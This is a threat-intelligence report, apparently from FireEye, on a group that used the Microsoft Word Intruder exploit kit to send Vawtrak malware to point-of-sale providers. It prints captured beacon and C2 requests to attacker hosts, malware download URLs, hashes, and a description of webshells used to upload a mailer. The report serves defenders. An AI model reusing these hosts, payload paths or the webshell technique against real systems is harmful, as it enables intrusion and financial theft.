Targeted Crimeware in the Midst of Indiscriminate Activity

Observers often depict cybercriminals’ attacks as indiscriminate, such as a spam campaign directed at thousands of people. Cybercriminals’ activity typically contrasts with the tactics of APT groups, who typically direct spearphishing activity against a specific individual, company or industry vertical and leverage exploits, sometimes zeroday exploits, to achieve their objectives. However, FireEye’s research published in April 2015 ­on a new document exploit kit, Microsoft Word Intruder (MWI), revealed that cybercriminals can purchase tools to conduct targeted intrusions. In fact, the distributor of MWI, who is also the author, markets the exploit kit as an “APT” tool—capable of directing an attack on a specific individual or firm—and has warned customers he will revoke the license of anyone caught using the tool for spam.

Although we have observed low volume spam campaigns by some cybercriminals who have purchased MWI, we recently discovered spearphishing emails by one group using MWI to direct an attack against point-of-sale (POS) service providers. Despite the targeted nature of the spearphishing emails, the payload was the widely distributed Vawktrak banking Trojan. In addition, we found that the infrastructure used in this case overlaps with FindPOS/PoSeidon as well as Chanitor and sits amidst a cluster of largely indiscriminate malicious activity.

This group’s use of MWI suggests some cyber criminals likely have added targeted intrusions to their tactics. Vawtrak may seem like an odd choice of a payload for a targeted intrusion, because cybercriminals typically distribute Vawtrak through spam, exploit kits (such as Angler), and downloaders (such as Chanitor that leverages Tor through tor2web servers). However, widely distributed tools like Vawtrak can be used to sift through compromised systems to identify specific victims for further exploitation. Below, we discuss how this activity and POS-specific malware indicates that cybercriminals may use Vawtrak to identify potential POS systems among the botnet’s already compromised victims.

Targeting POS Providers

To target a specific POS provider, a cybercriminal group registered a domain name, [redacted].net, and sent a spearphishing email from this domain to impersonate an actual restaurant in New York City.

The email contains an attachment “[redacted]_bus_card.doc” (6adb338e08bcead42cd51f0b5b573a58), which is a malicious document built with the MWI document exploit kit. When opened this document will beacon to an MWISTAT server, 91.220.131.245, to download a malware payload.

GET /joomla/image.php?id=90440600 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
Trident/4.0; .NET CLR 2.0.50727; .NET CLR
3.0.04506.648; .NET CLR
3.5.21022; InfoPath.2; .NET4.0C; .NET4.0E; MSOffice 12)
Accept-Encoding: gzip, deflate
Host: 91.220.131.245
Connection: Keep-Alive

The payload served by MWISTAT has the ID 90440600. This unique ID is generated by MWISTAT so that the treat group can track the progression of a particular campaign.  The payload (f4d48337c38988acc43b64ee180fa8a0) is Vawtrak, a banking Trojan that not only has a web-injects framework but can also steal passwords and digital certificates, log keystrokes, take screenshots and enable VNC capabilities so the threat actors can interact with the victim via a remote desktop.

In this case, Vawtrak connected to a C2 server at winfertrow[.]com (162.247.15.60):

POST /stats/00/counter/00000070/[redacted] HTTP/1.1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;
Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR
3.5.21022; InfoPath.2; .NET4.0C; .NET4.0E)

Host: winfertrow.com
Content-Length: 251

The beacon contains a PROJECT_ID value (00000070) that is used to determine which configuration file to send to the victim. In this case, a configuration files was sent that contains webinjects that allows the cybercriminals to steal credentials for a number of banks globally as well as popular services.

The reply from the C2 also instructed the compromised computer to download an update from  hxxp://pickleweb[.]net/upd/112?id=[redacted]&o=1&n=4 (pickleweb[.]net  (which didn’t resolve at the time of our analysis) and open a connection to 91.220.131.66 on port 8080.

In total we found three malicious MWI documents that connects to the MWISTAT server at 91.220.131.245 and 91.220.131.243 (both IP addresses actually point to the same server) and both payloads that we were able to download are Vawtrak.

  • [redacted]_bus_card.doc (6adb338e08bcead42cd51f0b5b573a58)
    • hxxp://91.220.131.245/joomla/image.php?id=90440600
      • 90440600 (f4d48337c38988acc43b64ee180fa8a0)
  • [redacted]_crash_log.doc (eccc3e3c3c9e863aaf31ec0e2825e820)
    • hxxp://91.220.131.245/joomla/image.php?id=48436619
      • 90440600 (unable to retrieve payload)
  • pos_list.doc (ac0b1712af0b1a41c6bd216d782022a4)
    • hxxp:// 91.220.131.243/dermo/image.php?id=94970298
      • 94970298 (cd128a85e0c89cf09cf31b85812a149e)

Each malicious document is configured to connect to the same MWISTAT server but with a different ID so that the cybercriminal group can track the effectiveness of each campaign. For each ID, the cybercriminal group can view the IP addresses and geographic location of each target that opened the specific document as well as if the payload was successfully delivered to the victim.

Webshells and Mailers

On the same server (91.220.131.245/91.220.131.243) we found a tool used by the cybercriminal group to check and access compromised web servers that had a webshell placed on them in order to upload a mailing script.

The tool looked for webshells named either “i.php” or “cached_data.php” and used them to upload PHPMailer to “phpm3.php”.

This mailer can then be used to send spam or spearphishing emails from the servers of compromised third parties.

A Bad Neighborhood: 91.220.131.0/24

The 91.220.131.0/24 IP address range is assigned to a hosting provider in Russia that is a hotspot for malicious activity. Not all of the activity found within this class-C subnet is necessarily directly linked together. This IP address range may belong to a provider who rents servers to a variety of cybercriminals. However, there are some significant overlaps between the spearphishing campaigns we observed, the Vawtrak payload, and the FindPOS/PoSeidon malware that enabled cybercriminals to extract payment card information from POS terminals. Coincidentally, the same class-C subnet hosts two “carder” shops that sell stolen payment card information.

The MWI/Vawtrak – FindPOS/PoSeidon Connection

The domain used to send the spearphishing email in this case, [redacted].net, was registered by an email address that was also used to register a number of domains which were used as a C2s for FindPOS/PoSeidon. In addition, we observed another FindPOS C2 registered by a different email address also resolve to an IP addresses in the same Class C as the MWISTAT server in this case. This email address was also used to register domain names used as Vawtrak C2s.

[redacted].net

sillitoexpya@rambler.ru

31.184.192.215

Spearphish

xablopefgr[.]com

sillitoexpya@rambler.ru

91.220.131.87

FindPOS

PoSeidon

repherfeted[.]com

barkmanueta@rambler.ru

91.220.131.108

FindPOS

PoSeidon

idthentehed[.]com

barkmanueta@rambler.ru

 

Vawtrak

rebteugrigh[.]com

barkmanueta@rambler.ru

 

Vawtrak

othersforrep[.]com

barkmanueta@rambler.ru

 

Vawtrak

cakedhisjohn[.]com

barkmanueta@rambler.ru

 

Vawtrak

Vawtrak/Chanitor Hosting

We also observed a Vawtrak sample hosted at hxxp://91.220.131.29/upd/install.exe (f06bef376ca88e1e4afe8716f20590cf).

This class-C subnet also acts as a host for a number of Chanitor download sites. Typically, Chanitor is propagated by spam emails with document attachments that use malicious macros to download a payload.

 

IP

Path

MD5

91.220.131.44

/upd/install.exe

b5a8116690a7bdf074db9329b23678b2

91.220.131.146

/upd3/install.exe

a74fcd114f1e6df76ce04a0975523cc7

91.220.131.114

/upd/install.exe

17f4394a5540e69a79b3c8cff3e1f225

91.220.131.49

/ant/file.exe

cbe589381dddacb1065cedd0a0094326

91.220.131.69

/ca/file.exe

4b78c2ab3629e51d8a6c8ffa4410b3f7

91.220.131.63

/ca/file.exe

4b78c2ab3629e51d8a6c8ffa4410b3f7

91.220.131.73

/ca/file.pif

6d35acab684d45d8a80c6201d060e6fa

91.220.131.38

/upd3/install.exe

2f108e18177dd7a6ae7e413e9153337d

91.220.131.28

/upd2/install.exe

dc7740f2ac76b8c5dccf686ad5fd0c05

91.220.131.40

/upd/install.exe

cb9749ce4cd28eb73bf9a6bedd2f0c5a

“Carder” Shops

In addition, we found that two “carder” shops that specialize in selling stolen credit cards are also located in this class-C subnet.

Both justbuy[.]cc and jworldtopcc[.]su are protected by CloudFlare; however, their true IP addresses are 91.220.131.242 and 91.220.131.84. Both shops appear to be updated with new stolen credit cards regularly.

Conclusion

Cybercriminals engage in both indiscriminate campaigns as well as targeted intrusions. Moreover, they may use their typical, indiscriminate campaigns to scout interesting victims—who have already been compromised—to further target specific individuals, companies, or industry verticals. The combination of these targeted intrusions with a widely deployed payload can make it difficult for network security monitors to assess the level of risk associated with the threat.

In addition to having access to multipurpose malware, such as Vawtrak, cybercriminals can also deploy additional malware, such as FindPOS, that specifically enables them to extract payment card information from POS terminals.

Network defenders of the common targets for cybercriminals—especially in retail and finance—should be aware that cybercriminals’ initial intrusion might only be the start of a deeper operation. Defenders should consider how these groups could use existing footholds to further exploit already compromised systems.